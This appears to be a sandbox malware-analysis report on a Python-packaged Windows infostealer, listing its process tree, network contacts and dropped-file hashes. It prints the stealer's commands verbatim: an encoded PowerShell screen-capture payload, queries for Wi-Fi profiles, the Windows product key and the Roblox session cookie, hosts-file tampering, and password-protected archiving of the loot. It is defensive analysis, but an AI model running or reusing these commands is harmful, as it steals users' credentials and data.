powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2nw24s4m\2nw24s4m.cmdline"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDF83.tmp" "c:\Users\Admin\AppData\Local\Temp\2nw24s4m\CSCA0E8358D17E44728FC69D24612FBFB4.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI37922\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\SHiPp.zip" *"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\_MEI37922\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI37922\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\SHiPp.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffb1f54cc40,0x7ffb1f54cc4c,0x7ffb1f54cc58
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1936,i,12494600982645067902,12892352908501684563,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1928 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1700,i,12494600982645067902,12892352908501684563,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2412 /prefetch:3
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2112,i,12494600982645067902,12892352908501684563,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2456 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3084,i,12494600982645067902,12892352908501684563,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3092 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3112,i,12494600982645067902,12892352908501684563,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3140 /prefetch:1
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4444,i,12494600982645067902,12892352908501684563,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4416 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4572,i,12494600982645067902,12892352908501684563,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4568 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3116,i,12494600982645067902,12892352908501684563,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4560 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4616,i,12494600982645067902,12892352908501684563,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4680 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4364,i,12494600982645067902,12892352908501684563,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4636 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4676,i,12494600982645067902,12892352908501684563,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5036 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4704,i,12494600982645067902,12892352908501684563,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4936 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5036,i,12494600982645067902,12892352908501684563,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4668 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4632,i,12494600982645067902,12892352908501684563,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4228 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4236,i,12494600982645067902,12892352908501684563,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5168 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4724,i,12494600982645067902,12892352908501684563,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4844 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | blank-k7wia.in | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| GB | 216.58.204.67:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 3.180.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 216.58.201.106:443 | ogads-pa.googleapis.com | tcp |
| GB | 216.58.201.110:443 | apis.google.com | tcp |
| GB | 216.58.213.1:443 | clients2.googleusercontent.com | tcp |
| GB | 216.58.201.106:443 | ogads-pa.googleapis.com | udp |
| GB | 142.250.200.14:443 | play.google.com | tcp |
| GB | 104.86.110.107:443 | tcp | |
| GB | 104.86.110.107:443 | tcp | |
| GB | 92.123.128.161:443 | r.bing.com | tcp |
| GB | 92.123.128.161:443 | r.bing.com | tcp |
| GB | 92.123.128.161:443 | r.bing.com | tcp |
| GB | 92.123.128.161:443 | r.bing.com | tcp |
| GB | 92.123.128.161:443 | r.bing.com | tcp |
| GB | 92.123.128.161:443 | r.bing.com | tcp |
| GB | 92.123.128.161:443 | r.bing.com | tcp |
| GB | 92.123.128.161:443 | r.bing.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI37922\python312.dll
| MD5 | 6f7c42579f6c2b45fe866747127aef09 |
| SHA1 | b9487372fe3ed61022e52cc8dbd37e6640e87723 |
| SHA256 | 07642b6a3d99ce88cff790087ac4e2ba0b2da1100cf1897f36e096427b580ee5 |
| SHA512 | aadf06fd6b4e14f600b0a614001b8c31e42d71801adec7c9c177dcbb4956e27617fa45ba477260a7e06d2ca4979ed5acc60311258427ee085e8025b61452acec |
C:\Users\Admin\AppData\Local\Temp\_MEI37922\VCRUNTIME140.dll
| MD5 | be8dbe2dc77ebe7f88f910c61aec691a |
| SHA1 | a19f08bb2b1c1de5bb61daf9f2304531321e0e40 |
| SHA256 | 4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83 |
| SHA512 | 0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655 |
memory/3256-25-0x00007FFB255E0000-0x00007FFB25CA5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI37922\base_library.zip
| MD5 | fe165df1db950b64688a2e617b4aca88 |
| SHA1 | 71cae64d1edd9931ef75e8ef28e812e518b14dde |
| SHA256 | 071241ac0fd6e733147a71625de5ead3d7702e73f8d1cbebf3d772cbdce0be35 |
| SHA512 | e492a6278676ef944363149a503c7fade9d229bddce7afa919f5e72138f49557619b0bdba68f523fffe7fbca2ccfd5e3269355febaf01f4830c1a4cc67d2e513 |
C:\Users\Admin\AppData\Local\Temp\_MEI37922\_ctypes.pyd
| MD5 | 0f090d4159937400db90f1512fda50c8 |
| SHA1 | 01cbcb413e50f3c204901dff7171998792133583 |
| SHA256 | ae6512a770673e268554363f2d1d2a202d0a337baf233c3e63335026d223be31 |
| SHA512 | 151156a28d023cf68fd38cbecbe1484fc3f6bf525e7354fcced294f8e479e07453fd3fc22a6b8d049ddf0ad6306d2c7051ece4e7de1137578541a9aabefe3f12 |
memory/3256-30-0x00007FFB37220000-0x00007FFB37245000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI37922\libffi-8.dll
| MD5 | 08b000c3d990bc018fcb91a1e175e06e |
| SHA1 | bd0ce09bb3414d11c91316113c2becfff0862d0d |
| SHA256 | 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece |
| SHA512 | 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf |
memory/3256-48-0x00007FFB3CE20000-0x00007FFB3CE2F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI37922\_ssl.pyd
| MD5 | 34402efc9a34b91768cf1280cc846c77 |
| SHA1 | 20553a06fe807c274b0228ec6a6a49a11ec8b7c1 |
| SHA256 | fe52c34028c5d62430ea7a9be034557ccfecdddda9c57874f2832f584fedb031 |
| SHA512 | 2b8a50f67b5d29db3e300bc0dd670dad0ba069afa9acf566cad03b8a993a0e49f1e28059737d3b21cef2321a13eff12249c80fa46832939d2bf6d8555490e99c |
C:\Users\Admin\AppData\Local\Temp\_MEI37922\_sqlite3.pyd
| MD5 | 37a88a19bb1de9cf33141872c2c534cb |
| SHA1 | a9209ec10af81913d9fd1d0dd6f1890d275617e8 |
| SHA256 | cca0fbe5268ab181bf8afbdc4af258d0fbd819317a78ddd1f58bef7d2f197350 |
| SHA512 | 3a22064505b80b51ebaa0d534f17431f9449c8f2b155ec794f9c4f5508470576366ed3ba5d2de7ddf1836c6e638f26cad8cb0cc496daf30ee38ca97557238733 |
C:\Users\Admin\AppData\Local\Temp\_MEI37922\_socket.pyd
| MD5 | f52c1c015fb147729a7caab03b2f64f4 |
| SHA1 | 8aebc2b18a02f1c6c7494271f7f9e779014bee31 |
| SHA256 | 06d91ac02b00a29180f4520521de2f7de2593dd9c52e1c2b294e717c826a1b7d |
| SHA512 | 8ab076c551f0a6ffe02c26b4f0fbb2ea7756d4650fe39f53d7bd61f4cb6ae81460d46d8535c89c6d626e7c605882b39843f7f70dd50e9daf27af0f8cadd49c0f |
C:\Users\Admin\AppData\Local\Temp\_MEI37922\_queue.pyd
| MD5 | 97cc5797405f90b20927e29867bc3c4f |
| SHA1 | a2e7d2399cca252cc54fc1609621d441dff1ace5 |
| SHA256 | fb304ca68b41e573713abb012196ef1ae2d5b5e659d846bbf46b1f13946c2a39 |
| SHA512 | 77780fe0951473762990cbef056b3bba36cda9299b1a7d31d9059a792f13b1a072ce3ab26d312c59805a7a2e9773b7300b406fd3af5e2d1270676a7862b9ca48 |
C:\Users\Admin\AppData\Local\Temp\_MEI37922\_lzma.pyd
| MD5 | 17082c94b383bca187eb13487425ec2c |
| SHA1 | 517df08af5c283ca08b7545b446c6c2309f45b8b |
| SHA256 | ddbfef8da4a0d8c1c8c24d171de65b9f4069e2edb8f33ef5dfecf93cb2643bd4 |
| SHA512 | 2b565d595e9a95aefae396fc7d66ee0aeb9bfe3c23d64540ba080ba39a484ab1c50f040161896cca6620c182f0b02a9db677dab099dca3cae863e6e2542bb12c |
C:\Users\Admin\AppData\Local\Temp\_MEI37922\_hashlib.pyd
| MD5 | 4dd4c7d3a7b954a337607b8b8c4a21d1 |
| SHA1 | b6318b830d73cbf9fa45be2915f852b5a5d81906 |
| SHA256 | 926692fcecdb7e65a14ac0786e1f58e880ea8dae7f7bb3aa7f2c758c23f2af70 |
| SHA512 | dab02496c066a70a98334e841a0164df1a6e72e890ce66be440b10fdeecdfe7b8d0ec39d1af402ae72c8aa19763c92dd7404f3a829c9fdcf871c01b1aed122e1 |
C:\Users\Admin\AppData\Local\Temp\_MEI37922\_decimal.pyd
| MD5 | a592ba2bb04f53b47d87b4f7b0c8b328 |
| SHA1 | ca8c65ab0aab0f98af8cc1c1cf31c9744e56a33c |
| SHA256 | 19fe4a08b0b321ff9413da88e519f4a4a4510481605b250f2906a32e8bb14938 |
| SHA512 | 1576fdc90d8678da0dab8253fdd8ec8b3ce924fa392f35d8c62207a85c31c26dae5524e983e97872933538551cbef9cd4ba9206bcd16f2ae0858ab11574d09e0 |
C:\Users\Admin\AppData\Local\Temp\_MEI37922\_bz2.pyd
| MD5 | adaa3e7ab77129bbc4ed3d9c4adee584 |
| SHA1 | 21aabd32b9cbfe0161539454138a43d5dbc73b65 |
| SHA256 | a1d8ce2c1efaa854bb0f9df43ebccf861ded6f8afb83c9a8b881904906359f55 |
| SHA512 | b73d3aba135fb5e0d907d430266754da2f02e714264cd4a33c1bfdeda4740bbe82d43056f1a7a85f4a8ed28cb7798693512b6d4cdb899ce65b6d271cf5e5e264 |
C:\Users\Admin\AppData\Local\Temp\_MEI37922\unicodedata.pyd
| MD5 | 2730c614d83b6a018005778d32f4faca |
| SHA1 | 611735e993c3cc73ecccb03603e329d513d5678a |
| SHA256 | baa76f6fd87d7a79148e32d3ae38f1d1fe5a98804b86e636902559e87b316e48 |
| SHA512 | 9b391a62429cd4c40a34740ddb04fa4d8130f69f970bb94fa815485b9da788bca28681ec7d19e493af7c99a2f3bf92c3b53339ef43ad815032d4991f99cc8c45 |
C:\Users\Admin\AppData\Local\Temp\_MEI37922\sqlite3.dll
| MD5 | de562be5de5b7f3a441264d4f0833694 |
| SHA1 | b55717b5cd59f5f34965bc92731a6cea8a65fd20 |
| SHA256 | b8273963f55e7bf516f129ac7cf7b41790dffa0f4a16b81b5b6e300aa0142f7e |
| SHA512 | baf1fbdd51d66ea473b56c82e181582bf288129c7698fc058f043ccfbcec1a28f69d89d3cfbfee77a16d3a3fd880b3b18fd46f98744190d5b229b06cf07c975a |
C:\Users\Admin\AppData\Local\Temp\_MEI37922\select.pyd
| MD5 | 9a59688220e54fec39a6f81da8d0bfb0 |
| SHA1 | 07a3454b21a831916e3906e7944232512cf65bc1 |
| SHA256 | 50e969e062a80917f575af0fe47c458586ebce003cf50231c4c3708da8b5f105 |
| SHA512 | 7cb7a039a0a1a7111c709d22f6e83ab4cb8714448daddb4d938c0d4692fa8589baa1f80a6a0eb626424b84212da59275a39e314a0e6ccaae8f0be1de4b7b994e |
C:\Users\Admin\AppData\Local\Temp\_MEI37922\rarreg.key
| MD5 | 4531984cad7dacf24c086830068c4abe |
| SHA1 | fa7c8c46677af01a83cf652ef30ba39b2aae14c3 |
| SHA256 | 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211 |
